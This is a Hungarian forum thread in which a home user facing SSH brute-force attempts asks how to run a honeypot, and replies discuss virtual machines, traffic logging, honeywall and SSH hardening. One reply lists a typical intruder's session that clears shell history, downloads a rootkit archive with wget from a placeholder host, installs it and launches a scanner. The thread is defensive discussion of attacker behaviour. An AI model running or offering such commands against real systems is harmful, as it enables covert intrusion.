Sziasztok!
Órák óta bombázza valaki az IP-met. A 22-es porton szeretne bejönni. Először kitiltottam az illető gépét, de most már kíváncsi vagyok, mit eredményezne, ha beengedném.
Mit javasoltok, hogyan engedjem betörni a gépemre úgy, hogy közben megfigyelhessem, mit csinál, miután bejött? Egyáltalán, hogyan könnyítsem meg a dolgát?
Root jelszó nélkül? Egy virtuális gépen pl. Virtualboxszal? (Bár azt nem tudom, hogyan kerül a 22-es port a Virtualbox-ban futtatott programhoz - ennyire nem ismerem a virtualizációt.)
Előre köszi a hasznos tippekért.
- 4374 megtekintés
Hozzászólások
A logolást szerintem (ha van rá módod) valami leporellós line_printer -re told ki (vagy egy másik gépre), így nem igazán fogja tudni megmódosítani. Illetve ez később bizonyítékként jól jöhet, illetve Neked is jó a biztonság növelésére. Mentésed mindeképp legyen.
Root jelszó nélkül? nem jó. Add fel neki a leckét, hogy megszerezze, így ami elkerülte a figyelmedet, azt ő majd "megoldja" helyetted, ha van annyi tudása.
ethereal/wireshark használata javallott egy másik gépről a hálózatban. Így a hálózati forgalmat monitorozhatod, sőt meg is szűrheted a beállításoknál, hogy csak a bombázott gép és a betörő közti csomagokat logolja.
aide vagy egyéb betörésérzékelő szintén jól jöhet.
Esetleg valami chroot -ba belezavarhatod az illetőt, így egy idő után elmegy a kedve az egésztől.
/mazursky
- A hozzászóláshoz be kell jelentkezni
chroot nem jo ilyen dolgokra ugy tudom (tehat bootstrapelni jo, de profi 2 sec alatt kitor a jailbol [mintha process ter kozos lenne, emiatt indithat olyan binarist shellbol ami chrooton kivul indul, illetve killelni is lehet chrooton kivulre megfelelo jogosultsagokkal])
bsd-s jail csinalna ilyesmit, en inkabb virtualis gepet javasolnek, biztos ami biztos, 22-es portra lehet forwardolni portot a host os-rol a guestre(vagy akar mar routerbol is beallithatja).
meg vannak asszem direkt ilyen honeypot szoftverek is.
Tyrael
- A hozzászóláshoz be kell jelentkezni
Honeypotnak hívják. A chroot jó lehet, ha grsec-es kerneled van vagy freebsd-n egy jailbe engeded be. A 22-es portot port portfw-al told át máshova. Egyébként hatalmas nagy dolgokat nem fogsz tapasztalni, mivel ezt vmi robot csinálja, szkennelve a sérülékeny gépek után. Valszin első dolga lesz hogy valami irc kliens felmegy egy bottal és onnan próbálnak majd okoskodni, pl. szintén elkezd ssh szkennelni és/vagy spammelni is.
- A hozzászóláshoz be kell jelentkezni
Honeypot?
- A hozzászóláshoz be kell jelentkezni
Semmiképp nem chroot-ba engedném, hanem egy virtuáls gépbe, aminek a bejövő 22-es portjára portforward-dal, némi sávszélesség-korlátozással beengedném, tcpdump vagy hasonló dologgal logolva a forgalmát (befelé és kifeé egyaránt), illetve a ttysnoop vagy hogy hívják cuccal a kiadott parancsokat is nyomnám fájlba/syslog-ba (másik virt. gépen futtatott syslog felé).
A virt. gép kifelé irányuló kapcsolódási kísérleteit (-s honeypot --state NEW) valami szép icmp-vel dobatnám el a tűzfalon (port-unreachable pl.).
- A hozzászóláshoz be kell jelentkezni
Marmint ugyerted, hogy az ssh kopogtatast te betoresi kiserletnek ertelmezed? Idestova ket eve gyakorlat a szerteagazo ipkrol brute force jellegu jelszo/felhasznalonev probalgatas. Mitol lenne ez ujkeletu es mitol lenne betoresi kiserlet? Es mibol gondolod, hogy tenne valamit ha sikerulne _belepni_ a szamitogepedre?
- A hozzászóláshoz be kell jelentkezni
Az, hogy megpróbál belépni ssh-n, az betörési kísérlet -- szerintem... És miért csinálná, ha nem akarna valamit tenni a megtámadott gépen?
- A hozzászóláshoz be kell jelentkezni
lehet csak figyelmeztetne hogy nyitva hagytad az ajtot :)
bar nem ez a gyakori, de ilyen is van.
Tyrael
- A hozzászóláshoz be kell jelentkezni
Willy, azt elfelejtettem írni, hogy ez egy otthoni, tehát elvileg dinamikus IP - gyakorlatilag hónapokig ua. Tegnap osztott a chello új IP-t és azon "kopoktatnak" keresvén a root, tom, clara stb. userek jelszavait. Ergo ez már betörési kísérlet.
Miért ne tenne? Viccből próbálja a robotprogram megtudni a root jelszót?
- A hozzászóláshoz be kell jelentkezni
Tok folos vele foglalkozni. Ennyi.
- A hozzászóláshoz be kell jelentkezni
Nem értek veled egyed.
1, Miért ne lehetnék kíváncsi? (Az nem visszatartó erő, mert te így gondolod.)
2, Egyszer egy rootkit már betört egy szerveremre kihasználva egy apache exploit bugot. Akkor láttam, hogy az OTP honlapját hamisították. (Kár, hogy nem tettem anno rendőrségi feljelentést.)
3, :) Willy, állandóan ilyen rezignált vagy... Amúgy van hasznos ötleted, vagy inkább OFF-olgatsz? Hja, erről jut eszembe, hogy egy általad üzemeltetett fórumon az OFF-ot te rühelled legjobban. Következetesség, willy, következetesség. :)
- A hozzászóláshoz be kell jelentkezni
"Egyszer egy rootkit már betört egy szerveremre kihasználva egy apache exploit bugot."
Au.
rootkit
exploit
bug (vulnerability)
--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!
- A hozzászóláshoz be kell jelentkezni
Igen.
De nem értem, ezekkel mit szeretnél mondani? (Régi ügy volt, a körülmény is érdekes volt, de most nem részletezem...)
- A hozzászóláshoz be kell jelentkezni
Hogy erzesem szerint nem vagy teljesen biztos a fenti fogalmak jelenteset illetoen.
--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!
- A hozzászóláshoz be kell jelentkezni
Nem akarok kekeckedni, hiszen segítőszándékkal írtad, így megfogalmazom másként: nem kiirtani akarom az esetleges "sikeres" támadás okozatait, hanem megvizsgálni.
- A hozzászóláshoz be kell jelentkezni
Arra gondol, hogy egy rootkit nem tor be sehova. A tamado tor be, aztan felrak egy rootkitet, hogy legkozelebb ugy tudjon betorni, hogy ne kelljen ujra feltornie a jelszokat, akkor sem, ha mar megvaltoztattad azokat.
- A hozzászóláshoz be kell jelentkezni
1, A kivancsisag jo dolog. Engem az ido hianya nem vezet ra.
2, Namost, ha ezt nezzuk nem betor(crack), hanem belep jogosulatlanul(not authorized login) (buntetojogilag ugyanazt jelenti). Pontosan megegyezik azzal, hogy te kiteszel egy kepet http protokollon keresztul, de nem mondod meg a file nevet, o meg probalkozva letolti. Vagy valo eletbol ragadva szivedhez kozelebb allo pelda(magyarazhato betoresnek): az eredetivel teljesen megegyezo kulcsal kinyit egy ajtot. (figyelem, egyik sem jelenti azt, hogy be is lep az ajton, vagy hasznalja a shellt, csak valoszinusitjuk, "miert is probalgatna egyebkent").
Egyik sem tul erdekes cselekmeny, elore legyartott botok probalkoznak. Namost, eljut odaig, hogy shell accountot szerzett a gepedre, akkor most jonne a privilegium szint noveles, illetve az adatlopas. Ez mar erdekesebb lenne, de ugye ez nem az a kategoria (belep es telepiti a scriptet amivel ssh kopogtat).
Na ezert irtam, hagyd a picsaba.
3, Ja ide tajekozodni, es "pihenni" jarok a slashdot, stb mellett egesz magyaros a hangvetele. Egy emberes a tajekoztatas, de jo.
Tekintheted offtopicnak amit irtam, en nem gondoltam (eddig) annak. Arrol akartalak lebeszelni, hogy foglalkozz vele. Nem ide tartozik a masik megjegyzesed, miszerint valamit uzemeltetek ebben arra gondoltal, hogy volt amikor moderaltam. Nos az meg munka volt a reszemrol, es probaltam kiszolgalni az embereket akik ott voltak. Az offtopic ott lepten nyomon es az olvasot zavaro mertekben jelent meg. Ez az iras messze tavol volt a 3-as pont kivetelevel a tema: "Vettem egy piros biciklit" valasz: "GYF mondjon le" sematol. Itt sikerult azer gyorsan ettol elternunk...
- A hozzászóláshoz be kell jelentkezni
Na, kb. ezt fogja csinálni:
pwd
uname -a
unset HISTORY; unset HISTLOG; unset HISTSAVE
wget http://xxxxxx/xxxx.tar.gz
tar xvzf xxxx.tar.gz
rm -f xxxx.tar.gz
cd r00tkit
./install
cd ..
cd scan
./scan &
exit
Nem nagy ügy, sript kiddiek, akik előre megírt utasításokat hajtanak végre, gépiesen.
Fogalmuk sincs, mit csinálnak... Többnyire. De nem baj, nagy hackerek... ;)
Amúgy azt se tudják, miért adják ki a parancsokat. pl. az unset-ek... Azt hiszik, ezzel törölték a nyomaikat. Ezt első kézből tudom, hogy azt hiszik...
Pedig max a rootkit telepítő gányol valamit, de az se tökéletesen.
Ha valakit érdekel mélyrehatóbban ez a dolog, szóljon nyugodtan. Össze tudom hozni egy-két hülyegyerekkel. :D
- A hozzászóláshoz be kell jelentkezni
Hehe, amíg itt sziporkáznak az agyak, a scanner rég továbblépett másik IP-re. :D
--
Coding for fun. ;)
- A hozzászóláshoz be kell jelentkezni
1-3 nap es jon a masik.
- A hozzászóláshoz be kell jelentkezni
A legjobb, ha fogsz 2 elfekvo gepet, es beallitod oket ugy, hogy az egyiket (honeypot) a masik (hivjuk gw-nek) keresztul erje el. A gw-re telepits egy honeywall-t, a honeypotra pedig egy tetszoleges linux disztrot, plusz egy sebek modult, aztan pedig erre a cuccra atforwardolod a probalkozokat (celszeruen nem csak ssh-n).
--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!
- A hozzászóláshoz be kell jelentkezni
sose ertettem, hogy miert jo az ssh-t a default porton hagyni?
nekem soha nem akart senki sem bejonni ssh-n...
- A hozzászóláshoz be kell jelentkezni
Mert mondjuk a munkahelyről a 22-es portra kiengedik, de a 223344-re nem... Bár ezesetben tessen a melóhelyi IP-re lekorlátozni a 22-es portot.
- A hozzászóláshoz be kell jelentkezni
Ha nem kell a gépen https, tedd a 443-ra. Haveromék kolijában tiltva van szinte minden, OpenVPN-t feltolta a HTTPS-re :)
- A hozzászóláshoz be kell jelentkezni
Gratula! Brilliáns ötlet! Kívülről a portscannaer https forgalmazást lát, affene se gondolná, hogy VPN van mögötte ;~)) Ügyes!
/mazursky
- A hozzászóláshoz be kell jelentkezni
Az. Sajnos én elvéreztem ezzel, mert a munkahelyemen csomagfejlécszűrés is van. :( Így nincs onnan kifelé ssh...
- A hozzászóláshoz be kell jelentkezni
Ha elég távolról egy terminál, akkor meegen ajánlom az AjaxTerm-et.
Kis Python-os progi, nagyon szép terminál ablakkal, böngészőből, proxyval akár 80-as porton is... (bár én inkább 443 (HTTPS)-el használom).
- A hozzászóláshoz be kell jelentkezni
Kipróbálom. Köszi a tippet.
- A hozzászóláshoz be kell jelentkezni
Amikor en attettem az otthoni gepemen szembesultem ezzel. Debreceni egyetemrol nem engedtek ki :(
Igy telik a logom a szemettel.
Uj reklamozasi forma: user nevekbe tenni a reklam szoveget, szigoruan admin celkozonseggel :)
- A hozzászóláshoz be kell jelentkezni
Uj reklamozasi forma: user nevekbe tenni a reklam szoveget, szigoruan admin celkozonseggel :)
hehe, mekkora otlet :D
- A hozzászóláshoz be kell jelentkezni
Ha nem valasztasz "1234" szintu jelszot, akkor kb. csak a napi logok mereteben van kulonbseg (ha nagyon be akarnak menni, akkor nem az ssh portszaman fog mulni a dolog).
A kerdes inkabb az, hogy miert jo az ssht pamos-jelszavas authentikacioval hasznalni a privat kulcsos helyett? :)
--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!
- A hozzászóláshoz be kell jelentkezni
Mert mondjuk OTP-t (OPIE) használ az emberfia, és nem nagyon akarja a kulcsát idegen gépen előszedni...
- A hozzászóláshoz be kell jelentkezni
Idegen geprol ne sshzz, opie ide vagy oda (hint: session hijacking).
--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!
- A hozzászóláshoz be kell jelentkezni
Ha annyira fontos, akkor tényleg ne, azonban nagyobb az esélye egy keyloggernek, mint egy kapcsolateltérítéses támadásnak, ergo a fenyegetettségek közül ez utóbbit nem, vagy nehéz kivédeni... (tudom, hogy hova megyek, viszem magammal a szerver publikus kulcsát...).
- A hozzászóláshoz be kell jelentkezni
Azért, mert ez otthoni és nem szervergép. Az sshd is csak azért futott, mert távolról kellett menedzselnem minap, és nem volt kedvem áttenni más portra. Amúgy a szerverek vagy VPN-en keresztül lehet elérni, vagy, ha a helyzet ezt nem teszi lehetővé akkor másik portra teszem.
- A hozzászóláshoz be kell jelentkezni
Hello!
Erre találták ki a flash drive-ot . Azon tudod tárolni a kulcsot és így tudod hordozni is.
Üdv.
- A hozzászóláshoz be kell jelentkezni
Hordozni igen, azonban be kell dugnod egy idegen gépbe, és be kell gépelned hozzá a passphrase-edet. Elvi lehetősége fennáll annak, hogy a kulcsodat és a passphrase-t lenyúlják...
- A hozzászóláshoz be kell jelentkezni
Teszel egy live cd-t a pendrivere. Es arrol be bootolsz az idegen gepen:D
- A hozzászóláshoz be kell jelentkezni
A hardver is lehet kompromittált.
- A hozzászóláshoz be kell jelentkezni
ssh val be jelentekzel a gepedre, megoldod a tranzakciokat, aztan le alitod az ssh-t vagy valahogy jelszot valtoztatsz ugy hogy ne kelljen hasznalni azt a gepet ami elot ulsz.
- A hozzászóláshoz be kell jelentkezni
Nem egyszerűbb egyszeri jelszót, vagy smartcardot használni?
- A hozzászóláshoz be kell jelentkezni
vagy egy laptopot? :)
- A hozzászóláshoz be kell jelentkezni
legjobb ha befaradsz a bankba. A biztonsagert meg kell szenvedni:D
- A hozzászóláshoz be kell jelentkezni
Tegyél fel OpenVMS-t és engedd be arra.
- A hozzászóláshoz be kell jelentkezni
loool, ezt egyszer kiprobalom :P
vagy valami mas egzotikus kis rendszerre :)
--
Segmentation violation -- Core dumped blues
- A hozzászóláshoz be kell jelentkezni
Akkor amit leszűrtem: virtualizált számítógép, és figyelőprogramok, na meg root jelszónak - hogy legyen egy kis feladata is a betörőnek - pl.: toor.
Amint hazaérek, csinálom is.
Köszönöm mindenkinek a javaslatokat.
- A hozzászóláshoz be kell jelentkezni
qemu-val tudsz "portot átirányítani" :)
debian gnu/linux @ linux-2.6.22.22-op1-rc1 | patch
info
- A hozzászóláshoz be kell jelentkezni
Azt is megvizsgálom... Köszönöm.
Jó ez az IP-m. :) Állandóan törekednek már más IP-kről is. Lehet, hogy előtte valami agyonfertőzött Windows useré volt. :) Szerintem nem is tudnék vele mail-t küldeni a mail.chello.hu-n keresztül.
- A hozzászóláshoz be kell jelentkezni
Először is, nem az IP-d miatt próbálkoznak mások. Ez teljesen mindennapos, bármelyik gép, ami neten van, és nyitva van a 22-es port, azon bepróbálkoznak a botok. Ennyi.
"Szerintem nem is tudnék vele mail-t küldeni a mail.chello.hu-n keresztül."
Ennek meg semmi értelme. Mivel smtp szerver az a chellos server ilyen esetben, ezért a levelet fogadó szerver nagyban tesz a te IP címedre, őt csak a chello szerver címe érdekli, és az alapján szűr.
- A hozzászóláshoz be kell jelentkezni
Először is, nem az IP-d miatt próbálkoznak mások.
Igen, tudom.
Mivel smtp szerver az a chellos server ilyen esetben, ezért a levelet fogadó szerver nagyban tesz a te IP címedre, őt csak a chello szerver címe érdekli, és az alapján szűr.
Általában igazad van. Ám a chello a kakukktojás, mert - ismereteim szerint - az az egyetlen ISP, amelyik a belső címtartományából érkező - és a chello MTA-ját használó - e-mail-ek küldő IP-jén is végez rbl szűrést. Erről volt többször is szó itt a HUP-on pl.: itt.
- A hozzászóláshoz be kell jelentkezni